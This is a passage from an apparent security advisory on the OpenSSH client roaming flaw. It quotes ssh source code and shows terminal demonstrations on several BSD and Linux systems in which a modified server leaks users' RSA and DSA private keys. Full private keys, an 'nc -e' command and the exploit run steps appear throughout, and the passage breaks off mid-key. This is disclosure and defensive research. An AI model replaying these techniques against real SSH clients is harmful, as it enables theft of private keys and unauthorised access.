$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor [reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor [reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor [reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor
- The special ProxyCommand "-" communicates with the server through the client's stdin and stdout, but these file descriptors are close()d by packet_backup_state() at the beginning of wait_for_roaming_reconnect() and are never reopened again, making it impossible for the client to reconnect to the server. Moreover, the fgetc() that waits for '\n' or '\r' on the closed stdin returns EOF and forces the client to exit():
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
$ /usr/bin/nc -e "/usr/bin/ssh -o ProxyCommand=- -p 222 127.0.0.1" 127.0.0.1 222 Pseudo-terminal will not be allocated because stdin is not a terminal. user@127.0.0.1's password: [connection suspended, press return to resume][exiting]
- The method ssh_proxy_fdpass_connect() fork()s a ProxyCommand that passes a connected file descriptor back to the client, but it calls fatal() while reconnecting to the server, because waitpid() returns ECHILD; indeed, the SIGCHLD handler (installed by SSH's main() after the first successful connection to the server) calls waitpid() before ssh_proxy_fdpass_connect() does:
1782 static void 1783 main_sigchld_handler(int sig) 1784 { .... 1789 while ((pid = waitpid(-1, &status, WNOHANG)) > 0 || 1790 (pid < 0 && errno == EINTR)) 1791 ; 1792 1793 signal(sig, main_sigchld_handler); .... 1795 }
101 static int 102 ssh_proxy_fdpass_connect(const char host, u_short port, 103 const char proxy_command) 104 { ... 121 / Fork and execute the proxy command. / 122 if ((pid = fork()) == 0) { ... 157 } 158 / Parent. / ... 167 while (waitpid(pid, NULL, 0) == -1) 168 if (errno != EINTR) 169 fatal("Couldn't wait for child: %s", strerror(errno));
$ /usr/bin/ssh -V OpenSSH_6.6.1p1, OpenSSL 1.0.1p-freebsd 9 Jul 2015
$ /usr/bin/ssh -o ProxyUseFdpass=yes -o ProxyCommand="/usr/bin/nc -F %h %p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume]Couldn't wait for child: No child processes
- The method ssh_proxy_connect() fork()s a standard ProxyCommand that connects the client to the server, but if a disconnection occurs, and the SIGCHLD of the terminated ProxyCommand is caught while fgetc() is waiting for a '\n' or '\r' on stdin, EOF is returned (the underlying read() returns EINTR) and the client exit()s before it can reconnect to the server:
$ /usr/bin/ssh -V OpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014
$ /usr/bin/ssh -o ProxyCommand="/bin/nc %h %p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][exiting]
This behavior is intriguing, because (at least on Linux and BSD) the signal() call that installed the main_sigchld_handler() is supposed to be equivalent to a sigaction() call with SA_RESTART. However, portable versions of OpenSSH override signal() with mysignal(), a function that calls sigaction() without SA_RESTART.
This last mitigating factor is actually a race-condition bug that depends on the ProxyCommand itself: for example, the client never fails to reconnect to the server when using Socat as a ProxyCommand, but fails occasionally when using Netcat.
Private Key Disclosure example: FreeBSD 10.0, 2048-bit RSA key
$ head -n 1 /etc/motd FreeBSD 10.0-RELEASE (GENERIC) #0 r260789: Thu Jan 16 22:34:59 UTC 2014
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-freebsd 11 Feb 2013
$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr qlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T M3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0 9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd a3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD zzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+ eIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE w3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk oayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc bvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C vcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW hZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW bc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd muzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP wn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF iKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw sj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme vOzVcOC+Y/wkpJET3ZEhNrPFZ0a0ab5JLxRwQk9mFYuGpOO8H5av5Nm8/PRB7JHi /rnxmfPGIWJX2dG9AInmVFGWBQCNUxwwQzpz9/VnngsjMWoYSayU534SrE36HFtE K+nsuxA+vtalgniToudAr6H5AoGADIkZeAPAmQQIrJZCylY00dW+9G/0mbZYJdBr +7TZERv+bZXaq3UPQsUmMJWyJsNbzq3FBIx4Xt0/QApLAUsa+l26qLb8V+yDCZ+n UxvMSgpRinkMFK/Je0L+IMwua00w7jSmEcMq0LJckwtdjHqo9rdWkvavZb13Vxh7 qsm+NEcCgYEA3KEbTiOU8Ynhv96JD6jDwnSq5YtuhmQnDuHPxojgxSafJOuISI11 1+xJgEALo8QBQT441QSLdPL1ZNpxoBVAJ2a23OJ/Sp8dXCKHjBK/kSdW3U8SJPjV pmvQ0UqnUpUj0h4CVxUco4C906qZSO5Cemu6g6smXch1BCUnY0TcOgs= -----END RSA PRIVATE KEY-----
env ROAMING="client_out_buf_size:1280" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-97ed9f59/infoleak
MIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr qlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T M3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0 9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd a3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD zzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+ eIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE w3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk oayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc bvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C vcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW hZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW bc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd muzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP wn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF iKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw sj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme
Private Key Disclosure example: FreeBSD 9.2, 1024-bit DSA key
$ head -n 1 /etc/motd FreeBSD 9.2-RELEASE (GENERIC) #0 r255898: Fri Sep 27 03:52:52 UTC 2013
$ /usr/bin/ssh -V OpenSSH_6.2p2, OpenSSL 0.9.8y 5 Feb 2013
$ cat ~/.ssh/id_dsa -----BEGIN DSA PRIVATE KEY----- MIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP grGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe 4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY 8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw oM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP IeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4 cRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+ iUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To zEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh PHatTfiy5p82Q8+TD60= -----END DSA PRIVATE KEY-----
env ROAMING="client_out_buf_size:768" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-9448bb7f/infoleak
MIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP grGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe 4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY 8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw oM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP IeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4 cRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+ iUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To ...
env ROAMING="client_out_buf_size:1024" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-279f5e2b/infoleak
... iUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To zEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh PHatTfiy5p82Q8+TD60= ...
Private Key Disclosure example: OpenBSD 5.4, 2048-bit RSA key
$ head -n 1 /etc/motd OpenBSD 5.4 (GENERIC) #37: Tue Jul 30 15:24:05 MDT 2013
$ /usr/bin/ssh -V OpenSSH_6.3, OpenSSL 1.0.1c 10 May 2012
$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc VEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL 9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175 ynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn w8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU MANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh oxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY mwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M k3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G +umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95 n5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt 8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw rsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5 cMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb 3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV WGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ pCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM T32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY FTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws uvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn zIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF ALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1 /tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk kRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS Y1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0= -----END RSA PRIVATE KEY-----
env ROAMING="client_out_buf_size:2048" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-35ee7ab0/infoleak
MIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc VEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL 9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175 ynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn w8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU MANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh oxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY mwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M k3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G +umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95 n5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt 8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw rsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5 cMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb 3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV WGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ pCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM T32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY FTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws uvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn zIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF ALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1 /tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk kRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS
$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-6cb31d82/infoleak
... uvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn zIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF ALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1 /tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk kRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS Y1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0=
Private Key Disclosure example: OpenBSD 5.8, 2048-bit RSA key
$ head -n 1 /etc/motd OpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015
$ /usr/bin/ssh -V OpenSSH_7.0, LibreSSL 2.2.2
$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEAwe9ssfYbABhOGxnBDsPf5Hwypr3tVz4ZCK2Q9ZWWBYnk+KVL ruLv7NWzeuKF7ls8z4SdpP/09QIIWQO5xWmQ7OM7ndfHWexFoyS/MijorHLvwG1s 17KFF8aC5vcBTfVkWnFaERueyd+mxv+oIrskA3/DK7/Juojkq70aPAdafiWOuVT8 L/2exFuzpSmwiXbPuiPgImO9O+9VQ4flZ4qlO18kZxXF948GisxxkceOYWTIX6uh xSs/NEGF/drmB4RTAL1ZivG+e4IMxs5naLz4u3Vb8WTDeS6D62WM1eq5JRdlZtGP vavL01Kv3sYFvoD0OPUU4BjU8bd4Qb30C3719wIDAQABAoIBAG4zFpipN/590SQl Jka1luvGhyGoms0QRDliJxTlwzGygaGoi7D800jIxgv13BTtU0i4Grw/lXoDharP Kyi6K9fv51hx3J2EXK2vm9Vs2YnkZcf6ZfbLQkWYT5nekacy4ati7cL65uffZm19 qJTTsksqtkSN3ptYXlgYRGgH5av3vaTSTGStL8D0e9fcrjSdN0UntjBB7QGT8ZnY gQ1bsSlcPM/TB6JYmHWdpCAVeeCJdDhYoHKlwgQuTdpubdlM80f6qat7bsm95ZTK QolQFpmAXeU4Bs5kFlm0K0qYFkWNdI16ScOpK6AQZGUTcHICeRL3GEm6NC0HYBNt gKHPucECgYEA7ssL293PZR3W9abbivDxvtCjA+41L8Rl8k+J0Dj0QTQfeHxHD2eL cQO2lx4N3E9bJMUnnmjxIT84Dg7SqOWThh3Rof+c/vglyy5o/CzbScISQTvjKfuB +s5aNojIqkyKaesQyxmdacLxtBBppZvzCDTHBXvAe4t8Bus2DPBzbzsCgYEAz+jl hcsMQ1egiVVpxHdjtm3+D1lbgITk0hzIt9DYEIMBJ7y5Gp2mrcroJAzt7VA2s7Ri hBSGv1pjz4j82l00odjCyiUrwvE1Gs48rChzT1PcQvtPCCanDvxOHwpKlUTdUKZh vhxPK/DW3IgUL0MlaTOjncR1Zppz4xpF/cSlYHUCgYB0MhVZLXvHxlddPY5C86+O nFNWjEkRL040NIPo8G3adJSDumWRl18A5T+qFRPFik/depomuQXsmaibHpdfXCcG 8eeaHpm0b+dkEPdBDkq+f1MGry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra uWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc prs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO ZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V 8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp ppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz uiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg== -----END RSA PRIVATE KEY-----
"pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -o ProxyCommand="/usr/bin/nc -w 1 %h %p" -p 222 127.0.0.1 [connection suspended, press return to resume]Segmentation fault (core dumped)
(this example requires a ProxyCommand because of the NULL-aitop bug described in the Mitigating Factors of the Information Leak section, and crashes because of the NULL-pointer dereference discussed in the Mitigating Factors of the Buffer Overflow section)
cat /tmp/roaming-a5eca355/infoleak
ry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra uWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc prs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO ZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V 8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp ppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz uiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg==
Private Key Disclosure example: CentOS 7, 1024-bit DSA key
$ grep PRETTY_NAME= /etc/os-release PRETTY_NAME="CentOS Linux 7 (Core)"
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
$ cat ~/.ssh/id_dsa -----BEGIN DSA PRIVATE KEY----- MIIBvQIBAAKBgQDmjJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe kt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5n GLnZn1lmDldNaqhV0ECESXZVEpq/8TR2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a Nmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC o7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsCioD2 hUaU7sV6Nho9fJIclxuxZP8j+uzidQKKN/+CVbQougsLsBlstpuQ4Hr2DHmalL8X iISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l B7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/ QlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS F9AoVoZFKEGn4FEoYIqY3a4= -----END DSA PRIVATE KEY-----
env ROAMING="heap_massaging:linux" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 ...
strings /tmp/roaming-b7b16dfc/infoleak
jJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe kt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5
strings /tmp/roaming-b324ce87/infoleak
IuQL R2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a Nmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC o7l7mJT+lI9v
strings /tmp/roaming-24011739/infoleak
KjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC o7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsC
strings /tmp/roaming-37456846/infoleak
LsBlstpuQ4Hr2DHmalL8X iISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l B7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZNA yq4Kwj/
strings /tmp/roaming-988ff54c/infoleak
GBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l B7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/
strings /tmp/roaming-53887fa5/infoleak
/4oatxFUV5V8aniqyq4Kwj/ QlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS F9AoVoZFKEGn4FEoYIqY3a4
Private Key Disclosure example: Fedora 20, 2048-bit RSA key
$ grep PRETTY_NAME= /etc/os-release PRETTY_NAME="Fedora 20 (Heisenbug)"
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEAmbj/XjOppLWSAhuLKiRoHsdp66LJdY2PvP0ht3GWDKKCk7Gz HLas5VjotS9rmupavGGDiicMHPClOttWAI9MRyvP77iZhSei/RzX1/UKk/broTDp o9ljBnQTzRAyw8ke72Ih77SOGfOLBvYlx80ZmESLYYH95aAeuuDvb236JnsgRPDQ /B/gyRIhfqis70USi05/ZbnAenFn+v9zoSduDYMzSM8mFmh9f+9PVb9qMHdfNkIy 2E78kt9BknU/bEcCWyL+IXNLV0rgRGAcE0ncKu13YvuH/7o4Q7bW2FYErT4P/FHK cRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt j737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o 6GEmk/oB9w9gf1zGqWkTytMiqcawMW4LZAJlSI/rGWe7lYHuceZSSgzd5lF4VP06 Xz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV JQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+prtAxpPNfKElEV7ZPBrTRAuCUr Hiy7yflZ3w0qHekNafX/tnWiU4zi/p6aD4rs10YaYSnSolsDs2k8wHbVP4VtLE8l PRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ 